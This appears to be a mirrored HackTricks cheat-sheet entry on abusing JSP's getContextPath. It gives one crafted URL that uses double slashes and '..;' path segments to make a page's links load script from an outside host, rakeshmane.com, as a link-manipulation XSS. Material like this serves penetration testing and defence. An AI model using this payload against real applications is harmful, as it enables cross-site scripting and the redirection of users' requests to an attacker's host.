mirror of
https://github.com/carlospolop/hacktricks
synced 2025-03-03 06:47:13 +00:00
17 lines
395 B
Markdown
17 lines
395 B
Markdown
# JSP
|
|
|
|
## **getContextPath** abuse
|
|
|
|
Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
|
|
|
|
```text
|
|
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
|
|
```
|
|
|
|
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
|
|
|
|
|
|
|
|
|
|
|
|
|